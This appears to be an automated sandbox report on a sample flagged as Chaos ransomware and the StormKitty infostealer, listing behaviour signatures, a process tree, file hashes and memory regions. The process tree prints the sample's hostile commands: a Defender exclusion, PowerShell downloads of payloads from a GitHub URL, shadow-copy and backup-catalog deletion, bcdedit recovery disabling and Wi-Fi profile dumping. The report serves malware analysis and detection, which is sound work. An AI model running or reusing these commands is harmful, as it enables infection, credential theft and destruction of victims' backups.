Analysis

  • max time kernel
    47s
  • max time network
    39s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23/03/2025, 20:29

General

  • Target

    initialize.exe

  • Size

    57KB

  • MD5

    f40b4d5dc143233298f0a5e78dd68a0f

  • SHA1

    87d23f60239c692e96ce5375ada123bbc3ebccc0

  • SHA256

    9e13904bbfb3b36110a58fc9f339fc82957e5c938c79bd87d9bcbbf04dcd65f7

  • SHA512

    0b8ab10ea18812a688b940946ddeeb9de83889a53a27efc6906c22735e72bcf98df6350e460f6090f043360b96b8349b9337ab3c9510a6f5b6fae2d0e1726f4b

  • SSDEEP

    1536:6rPJVKjbcknWSOYvTfkWkFM79yQVuuSCRc:6LJMjbcHDdMwQ7

Malware Config

Signatures

  • Chaos

    Ransomware family first seen in June 2021.

  • Chaos Ransomware 2 IoCs
  • Chaos family
  • StormKitty

    StormKitty is an open source info stealer written in C#.

  • StormKitty payload 2 IoCs
  • Stormkitty family
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Deletes backup catalog 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Disables Task Manager via registry modification
  • Downloads MZ/PE file 2 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 3 IoCs
  • Executes dropped EXE 3 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

  • Drops desktop.ini file(s) 64 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Hide Artifacts: Ignore Process Interrupts 1 TTPs 2 IoCs

    Command interpreters often include specific commands/flags that ignore errors and other hangups.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Checks SCSI registry key(s) 3 TTPs 4 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Interacts with shadow copies 3 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies registry class 1 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Runs net.exe
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 55 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 60 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\initialize.exe
    "C:\Users\Admin\AppData\Local\Temp\initialize.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3764
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\6997.tmp\6998.tmp\6999.bat C:\Users\Admin\AppData\Local\Temp\initialize.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3120
      • C:\Windows\system32\net.exe
        net session
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1672
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 session
          4⤵
            PID:2056
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -ExclusionPath \"$env:TEMP\" -ErrorAction SilentlyContinue"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Hide Artifacts: Ignore Process Interrupts
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4432
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -NoProfile -ExecutionPolicy Bypass -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; iwr -Uri \"https://github.com/nfdsafnsdl/login/releases/download/V1/build.exe\" -OutFile \"C:\Users\Admin\AppData\Local\Temp\build.exe\" -ErrorAction Stop"
          3⤵
          • Blocklisted process makes network request
          • Downloads MZ/PE file
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:5248
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -NoProfile -ExecutionPolicy Bypass -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; iwr -Uri \"https://github.com/nfdsafnsdl/login/releases/download/V1/kernelv.exe\" -OutFile \"C:\Users\Admin\AppData\Local\Temp\kernelv.exe\" -ErrorAction Stop"
          3⤵
          • Blocklisted process makes network request
          • Downloads MZ/PE file
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:852
        • C:\Users\Admin\AppData\Local\Temp\build.exe
          "C:\Users\Admin\AppData\Local\Temp\build.exe"
          3⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:5236
          • C:\Users\Admin\AppData\Roaming\svchost.exe
            "C:\Users\Admin\AppData\Roaming\svchost.exe"
            4⤵
            • Checks computer location settings
            • Drops startup file
            • Executes dropped EXE
            • Drops desktop.ini file(s)
            • Sets desktop wallpaper using registry
            • Modifies registry class
            • Suspicious behavior: AddClipboardFormatListener
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1556
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:2096
              • C:\Windows\system32\vssadmin.exe
                vssadmin delete shadows /all /quiet
                6⤵
                • Interacts with shadow copies
                PID:5420
              • C:\Windows\System32\Wbem\WMIC.exe
                wmic shadowcopy delete
                6⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:5136
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:1908
              • C:\Windows\system32\bcdedit.exe
                bcdedit /set {default} bootstatuspolicy ignoreallfailures
                6⤵
                • Modifies boot configuration data using bcdedit
                PID:5460
              • C:\Windows\system32\bcdedit.exe
                bcdedit /set {default} recoveryenabled no
                6⤵
                • Modifies boot configuration data using bcdedit
                PID:6116
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:220
              • C:\Windows\system32\wbadmin.exe
                wbadmin delete catalog -quiet
                6⤵
                • Deletes backup catalog
                PID:3284
            • C:\Windows\system32\NOTEPAD.EXE
              "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\readme.txt
              5⤵
              • Opens file in notepad (likely ransom note)
              • Suspicious use of FindShellTrayWindow
              PID:5876
        • C:\Users\Admin\AppData\Local\Temp\kernelv.exe
          "C:\Users\Admin\AppData\Local\Temp\kernelv.exe"
          3⤵
          • Executes dropped EXE
          • Accesses Microsoft Outlook profiles
          • System Location Discovery: System Language Discovery
          • Checks processor information in registry
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          • outlook_office_path
          • outlook_win_path
          PID:3768
          • C:\Windows\SysWOW64\cmd.exe
            "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
            4⤵
            • System Location Discovery: System Language Discovery
            • System Network Configuration Discovery: Wi-Fi Discovery
            • Suspicious use of WriteProcessMemory
            PID:4160
            • C:\Windows\SysWOW64\chcp.com
              chcp 65001
              5⤵
              • System Location Discovery: System Language Discovery
              PID:6108
            • C:\Windows\SysWOW64\netsh.exe
              netsh wlan show profile
              5⤵
              • Event Triggered Execution: Netsh Helper DLL
              • System Location Discovery: System Language Discovery
              • System Network Configuration Discovery: Wi-Fi Discovery
              PID:6120
            • C:\Windows\SysWOW64\findstr.exe
              findstr All
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2744
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 3768 -s 2468
            4⤵
            • Program crash
            PID:5288
          • C:\Windows\SysWOW64\cmd.exe
            "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
            4⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:4504
            • C:\Windows\SysWOW64\chcp.com
              chcp 65001
              5⤵
              • System Location Discovery: System Language Discovery
              PID:1376
            • C:\Windows\SysWOW64\netsh.exe
              netsh wlan show networks mode=bssid
              5⤵
              • Event Triggered Execution: Netsh Helper DLL
              • System Location Discovery: System Language Discovery
              PID:1060
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -NoProfile -ExecutionPolicy Bypass -Command "Remove-MpPreference -ExclusionPath \"$env:TEMP\" -ErrorAction SilentlyContinue"
          3⤵
          • Hide Artifacts: Ignore Process Interrupts
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2656
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3768 -ip 3768
      1⤵
        PID:4408
      • C:\Windows\system32\vssvc.exe
        C:\Windows\system32\vssvc.exe
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1496
      • C:\Windows\system32\wbengine.exe
        "C:\Windows\system32\wbengine.exe"
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1876
      • C:\Windows\System32\vdsldr.exe
        C:\Windows\System32\vdsldr.exe -Embedding
        1⤵
          PID:1444
        • C:\Windows\System32\vds.exe
          C:\Windows\System32\vds.exe
          1⤵
          • Checks SCSI registry key(s)
          PID:5588

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\2012_x64_1_vcRuntimeAdditional_x64.log

          Filesize

          1B

          MD5

          d1457b72c3fb323a2671125aef3eab5d

          SHA1

          5bab61eb53176449e25c2c82f172b82cb13ffb9d

          SHA256

          8a8de823d5ed3e12746a62ef169bcf372be0ca44f0a1236abc35df05d96928e1

          SHA512

          ca63c07ad35d8c9fb0c92d6146759b122d4ec5d3f67ebe2f30ddb69f9e6c9fd3bf31a5e408b08f1d4d9cd68120cced9e57f010bef3cde97653fed5470da7d1a0

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\build.exe.log

          Filesize

          226B

          MD5

          28d7fcc2b910da5e67ebb99451a5f598

          SHA1

          a5bf77a53eda1208f4f37d09d82da0b9915a6747

          SHA256

          2391511d0a66ed9f84ae54254f51c09e43be01ad685db80da3201ec880abd49c

          SHA512

          2d8eb65cbf04ca506f4ef3b9ae13ccf05ebefab702269ba70ffd1ce9e6c615db0a3ee3ac0e81a06f546fc3250b7b76155dd51241c41b507a441b658c8e761df6

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

          Filesize

          2KB

          MD5

          d85ba6ff808d9e5444a4b369f5bc2730

          SHA1

          31aa9d96590fff6981b315e0b391b575e4c0804a

          SHA256

          84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

          SHA512

          8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          944B

          MD5

          05b616eb1d81480626e2d2e1da9f75e4

          SHA1

          08426a539bd7fd5e7ada0673378143a81b937e4b

          SHA256

          9bc8077a440f3351ddd5486143c6996eff21690fa58c65417b8917fc435e8a43

          SHA512

          3ea70a33adaaaf4c5a2effb12267a4555a9585b7e2ff70c9bc56333f5a51fc973e2dd11e67b13fa4f9aea68b51dcdf94ef32776899ca33345bb5cc776599d3c3

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          8563f3330e225c8acd3d9ccbb3a0cf88

          SHA1

          25c17a1dbf116a256fcae066ffa26aecc353fa79

          SHA256

          532d7be532060b508f4510b0c22c23af942aba53a6242474339464fd0b6e9c97

          SHA512

          0efffa142a3a4ef70a3c21ae0f952e3ef6db81cc4a1bacb5b7bac23fa3e5cdf6574df3b7b2a4047b43be9c588884b7f3d945e01859d9009de0c45033e1da8dd6

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          9843d1de2b283224f4f4b8730ccc919f

          SHA1

          c053080262aef325e616687bf07993920503b62b

          SHA256

          409d2853e27efaa5b7e5459a0c29103197e9d661338996a13d61ca225b2222d1

          SHA512

          13d5809d2078ecd74aec818b510a900a9071605863b0a10037b3a203b76ea17598436ca5049cd13cf3442352670b21d386e84a88bece36e3440d408f123475de

        • C:\Users\Admin\AppData\Local\Temp\212.102.63.147\Browsers\Firefox\FirefoxBookmarks.txt

          Filesize

          81B

          MD5

          ea511fc534efd031f852fcf490b76104

          SHA1

          573e5fa397bc953df5422abbeb1a52bf94f7cf00

          SHA256

          e5fe7f327ae62df007bd1117aa7f522dbbcd371ec67953f66d786424cb1d7995

          SHA512

          f7d8e575a2332b0fbd491b5e092b7ed6b0942a5165557fcc5d215d873b05103aa6ba01843133871c1c7ac81b10182a15895be49885c98d1a379dd55f88004fae

        • C:\Users\Admin\AppData\Local\Temp\212.102.63.147\System\Process.txt

          Filesize

          566B

          MD5

          607ace3c1db4ccb7274fe6fbb1ad9bbc

          SHA1

          343300ce74d758fddff1da4128e116a136ce17d2

          SHA256

          102e4ab1cd1a981104e308493207e93ab61b38891c593693ab115333164e37d7

          SHA512

          ab7056134f65b4cf05b0b6f3b600663f1fd21a08987527cf7e6185c298561cfbccf32bc3dc6e6aa64613dcea5dea118aa2450f2e77b8197ab917091ee0abc919

        • C:\Users\Admin\AppData\Local\Temp\6997.tmp\6998.tmp\6999.bat

          Filesize

          2KB

          MD5

          1c935ef28fdfd394b770d945d7f04d76

          SHA1

          29e251c3c40ce4ad1b2984bf26b444aa045d9b21

          SHA256

          aa58e1df5882878a44687853f47d10b655c3fe888ec20fb99446305f5d38c681

          SHA512

          a9e60f2ac4aec15a3ba0a95df224449f64777a027357792247dd597529542e79128aec996c89ff86a1654911b4b763c577d3c3d2f38c59b02b280b8ad824e7e1

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_aundpe1d.4i2.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • C:\Users\Admin\AppData\Local\Temp\build.exe

          Filesize

          137KB

          MD5

          7605fb5c749eeea0b1b27fdaad78051c

          SHA1

          28388bf016af085bbcbacf8c516853942f6ec8d3

          SHA256

          466a92e378a95752870abddd6af278fba89c5fef2cb3adfe2c4c114b9bd7cd93

          SHA512

          1a3780652e092bd0be5c45cf034b2d0737324009c4d7d74e5cca193f75f285be85fa1631a68c6955566206dc3d51ba2dab9c4acfc74f9652ed2c04976ae3ee54

        • C:\Users\Admin\AppData\Local\Temp\kernelv.exe

          Filesize

          211KB

          MD5

          b6054dbe4ed853c2e35291f045a632ba

          SHA1

          1355fbe1ea1f6bb566921f04512f78590c4b0e41

          SHA256

          b58d783278e142a6242ff79712a1af504098c9a930271419bbf381caf45e29c4

          SHA512

          648e714669a3434c68091e23c2921f1b535fff0c43402ea57b8c3903282ea885c43f57746772a23674abaf80885aa52b99ece38663f4c0200a9ee9823a752da0

        • C:\Users\Admin\readme.txt

          Filesize

          780B

          MD5

          60d646f40556d78166ad8111d850fc51

          SHA1

          babaaf0762000dbf4b3f7a93beb35b6d9279d94d

          SHA256

          a66f43f9660c0b16c59eb22b1037c19af06f89d875344446cc63e90437f78fab

          SHA512

          3fb8acd626a012402669e42e760dd5b0efe2d2a37f3e71310c4a80a14491ee973713fcb0d90f99d40f0749c1dd16e8153afcb757e25de34c9ec9c82a58e81bc6

        • memory/3764-65-0x0000000140000000-0x0000000140027000-memory.dmp

          Filesize

          156KB

        • memory/3764-0-0x0000000140000000-0x0000000140027000-memory.dmp

          Filesize

          156KB

        • memory/3768-66-0x0000000005050000-0x0000000005212000-memory.dmp

          Filesize

          1.8MB

        • memory/3768-63-0x0000000002940000-0x0000000002952000-memory.dmp

          Filesize

          72KB

        • memory/3768-61-0x0000000000630000-0x000000000066C000-memory.dmp

          Filesize

          240KB

        • memory/3768-67-0x0000000005F90000-0x00000000064BC000-memory.dmp

          Filesize

          5.2MB

        • memory/3768-68-0x00000000068C0000-0x0000000006926000-memory.dmp

          Filesize

          408KB

        • memory/3768-69-0x0000000006BE0000-0x0000000006C72000-memory.dmp

          Filesize

          584KB

        • memory/4432-18-0x00007FFA87C20000-0x00007FFA886E1000-memory.dmp

          Filesize

          10.8MB

        • memory/4432-15-0x00007FFA87C20000-0x00007FFA886E1000-memory.dmp

          Filesize

          10.8MB

        • memory/4432-14-0x00007FFA87C20000-0x00007FFA886E1000-memory.dmp

          Filesize

          10.8MB

        • memory/4432-4-0x0000021FDD320000-0x0000021FDD342000-memory.dmp

          Filesize

          136KB

        • memory/4432-3-0x00007FFA87C23000-0x00007FFA87C25000-memory.dmp

          Filesize

          8KB

        • memory/5236-49-0x0000000000B70000-0x0000000000B98000-memory.dmp

          Filesize

          160KB